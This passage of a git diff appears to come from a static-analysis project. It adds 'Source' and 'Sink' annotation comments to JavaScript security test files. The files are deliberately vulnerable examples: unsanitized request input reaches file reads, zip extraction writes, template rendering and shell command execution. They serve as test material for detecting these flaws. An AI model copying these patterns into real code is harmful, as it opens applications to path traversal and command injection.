.../query-tests/Security/CWE-776/jquery.js | 2 +- .../test/query-tests/Security/CWE-807/tst.js | 2 +- .../Security/CWE-829/insecure-download.js | 2 +- .../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../test/query-tests/Security/CWE-843/tst.js | 8 +- .../Security/CWE-912/HttpToFileAccess.js | 2 +- .../test/query-tests/Security/CWE-912/tst.js | 2 +- .../PrototypePollutingAssignment/lib.js | 20 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 6 +- .../examples/PrototypePollutingFunction.js | 2 +- .../path-assignment.js | 8 +- .../PrototypePollutingFunction/tests.js | 50 ++-- .../angularmerge.js | 2 +- .../src-vulnerable-lodash/tst.js | 4 +- .../webix/webix.html | 2 +- .../webix/webix.js | 2 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 64 ++--- 211 files changed, 797 insertions(+), 797 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index f2ee8a6dd3c3..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,6 +1,6 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source externalLib(untrusted); // $ Alert externalLib({x: untrusted}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index 2c915a920b16..573302c33cc5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,7 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index cc36f38be2dc..ba57e930f03f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system @@ -33,7 +33,7 @@ var server = http.createServer(function(req, res) { path = sanitize(path); res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; + path = url.parse(req.url, true).query.path; // $ Source // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved @@ -70,7 +70,7 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, @@ -106,13 +106,13 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -136,7 +136,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); @@ -181,14 +181,14 @@ var server = http.createServer(function(req, res) { const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source cp.execSync("foobar", {cwd: path}); // $ Alert cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); @@ -197,7 +197,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index a3e4028b0daa..568269866f5f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -5,7 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 2c251b8de379..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -8,7 +8,7 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -18,7 +18,7 @@ app.get('/basic', (req, res) => { }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -28,7 +28,7 @@ app.get('/normalize', (req, res) => { }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; @@ -51,7 +51,7 @@ app.get('/normalize-notAbsolute', (req, res) => { }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; @@ -70,7 +70,7 @@ app.get('/normalize-noInitialDotDot', (req, res) => { app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) fs.readFileSync(path); @@ -79,7 +79,7 @@ app.get('/prepend-normalize', (req, res) => { }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; @@ -91,7 +91,7 @@ app.get('/absolute', (req, res) => { }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; @@ -114,7 +114,7 @@ app.get('/combined-check', (req, res) => { }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert @@ -127,7 +127,7 @@ app.get('/realpath', (req, res) => { }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); @@ -136,7 +136,7 @@ app.get('/coerce-relative', (req, res) => { }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) fs.readFileSync(path); @@ -145,7 +145,7 @@ app.get('/coerce-absolute', (req, res) => { }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check @@ -157,7 +157,7 @@ app.get('/concat-after-normalization', (req, res) => { }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; @@ -171,7 +171,7 @@ app.get('/noDotDot', (req, res) => { }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. @@ -211,7 +211,7 @@ app.get('/join-regression', (req, res) => { }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) fs.readFileSync(path); @@ -223,7 +223,7 @@ app.get('/decode-after-normalization', (req, res) => { }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { fs.readFileSync(path); // $ Alert @@ -233,7 +233,7 @@ app.get('/replace', (req, res) => { }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -251,7 +251,7 @@ app.get('/resolve-path', (req, res) => { }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -300,7 +300,7 @@ app.get('/relative-startswith', (req, res) => { var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { fs.readFileSync(path); @@ -336,7 +336,7 @@ app.get('/pseudo-normalizations', (req, res) => { }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -351,7 +351,7 @@ app.get('/yet-another-prefix', (req, res) => { var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -374,7 +374,7 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -382,7 +382,7 @@ app.get('/slash-stuff', (req, res) => { }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert @@ -409,7 +409,7 @@ app.get('/join-spread', (req, res) => { }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 8d2bfe11feb7..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,7 +6,7 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert gracefulFs.readFileSync(path); // $ Alert @@ -35,7 +35,7 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source util.promisify(fs.readFileSync)(path); // $ Alert require("bluebird").promisify(fs.readFileSync)(path); // $ Alert @@ -46,7 +46,7 @@ http.createServer(function(req, res) { const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert asyncFS.readFileSync(path); // $ Alert @@ -65,7 +65,7 @@ http.createServer(function(req, res) { const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert mkdirp(path); // $ Alert @@ -78,7 +78,7 @@ function func(x) { const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index d3ee99d4974b..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,7 +3,7 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; + const { p } = req.params; // $ Source prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 37f8c348a0f6..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js @@ -2,7 +2,7 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index fa19da302606..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index aaa6cfdc2407..ab5d3f008507 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -36,7 +36,7 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source nodefs.readFileSync(path); // $ Alert }); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index e18e3c7e8bb1..a21ae5a6f915 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index d705be16b317..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path.substring(i, j)); fs.readFileSync(path.substring(4)); // $ Alert fs.readFileSync(path.substring(0, i)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 097bcc1fa117..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index 51549ea75658..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index f16a816b73c4..e7ad3b8e264d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -5,7 +5,7 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; @@ -13,14 +13,14 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(Writer({path: fileName})); + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - var file = fs.openSync(fileName, "w"); + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); @@ -28,11 +28,11 @@ const zip = new JSZip(); const path = require('path'); function doZipSlip() { for (const name in zip.files) { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink } zip.forEach((name, file) => { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index 6960ac4eeae1..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js @@ -3,6 +3,6 @@ var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { var fileName = 'output/path/' + entry.path; // $ Alert - fs.writeFileSync(fileName, entry.contents); + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 2ba62e67480d..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -5,5 +5,5 @@ fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { var fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index 8b6c30c46947..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -4,8 +4,8 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source res.render('template', bodyParameter); // $ Alert res.render('template', queryParameter); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 8f8b075010bf..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -3,7 +3,7 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -23,7 +23,7 @@ app3.post('/path', require('body-parser').json(), function(req, res) { var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -31,7 +31,7 @@ var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -39,7 +39,7 @@ var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 3f50d6d5df66..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,7 +5,7 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; + const title = github.context.payload.pull_request.title; // $ Source exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; @@ -15,7 +15,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; + const head_ref = github.context.payload.pull_request.head.ref; // $ Source aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index ed1c9041a8ea..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -3,7 +3,7 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source cp.exec("foo"); cp.execSync("foo"); @@ -36,25 +36,25 @@ var server = http.createServer(function(req, res) { sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // $ Alert + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile("/bin/bash", args); // $ Alert args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink run("sh", args); args = []; args[0] = `-` + "c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink let myArgs = []; myArgs.push(`-` + "c"); @@ -63,14 +63,14 @@ var server = http.createServer(function(req, res) { }); -function run(cmd, args) { +function run(cmd, args) { // $ Sink cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source util.promisify(cp.exec)(cmd); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b2cfe4424039..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index 9d12f22bb249..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // $ Alert + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 1cfc40856113..45f3e25a8971 100644 --- 